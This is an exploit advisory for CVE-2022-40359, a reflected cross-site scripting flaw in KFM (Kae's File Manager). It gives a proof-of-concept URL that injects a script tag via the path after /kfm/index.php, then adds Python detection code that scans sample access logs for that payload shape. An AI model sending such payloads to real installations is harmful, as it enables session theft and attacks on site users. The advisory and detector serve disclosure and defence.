# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS)
# Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com'
# Vendor Homepage: https://code.google.com/archive/p/kfm/downloads
# Software Link: https://code.google.com/archive/p/kfm/downloads
# Version: ALL
# Tested on: Linux, Windows
# CVE : CVE-2022-40359

Cross-site scripting (XSS) vulnerability in kfm through 1.4.7 via a crafted GET request to /kfm/index.php.

Visit the PoC URL in a browser:

https://{URL}/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E
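Defender-side detection for the request shape above, as an added example that is not part of the advisory: it scans constructed access-log lines (sample data, not real captures) for script markup in the path info handed to /kfm/index.php, URL-decoding repeatedly so double-encoded variants of the same payload are caught as well. That the payload travels in PATH_INFO after index.php is inferred from the PoC URL.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the advisory); the third
# carries the CVE-2022-40359 PoC path, the fourth a double-encoded variant.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2022:10:00:01 +0000] "GET /kfm/index.php HTTP/1.1" 200 512
10.0.0.5 - - [01/Oct/2022:10:00:02 +0000] "GET /kfm/kfm.js HTTP/1.1" 200 9031
10.0.0.9 - - [01/Oct/2022:10:00:03 +0000] "GET /kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E HTTP/1.1" 200 640
10.0.0.9 - - [01/Oct/2022:10:00:04 +0000] "GET /kfm/index.php/%253Cscript%253E HTTP/1.1" 200 640
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')
# Markup that should never appear in a path segment reflected by index.php.
TAG_RE = re.compile(r"<\s*/?\s*script\b|on\w+\s*=|javascript:", re.IGNORECASE)


def decode_fully(s: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%253C) are exposed."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def find_kfm_xss(log_text: str) -> list:
    """Return one record per request whose path info under /kfm/index.php
    decodes to script markup, i.e. the CVE-2022-40359 PoC shape."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group("path")
        if "/kfm/index.php/" not in path:  # payload rides on PATH_INFO
            continue
        path_info = decode_fully(path.split("/kfm/index.php/", 1)[1])
        if TAG_RE.search(path_info):
            hits.append({"client": line.split()[0], "path_info": path_info})
    return hits
```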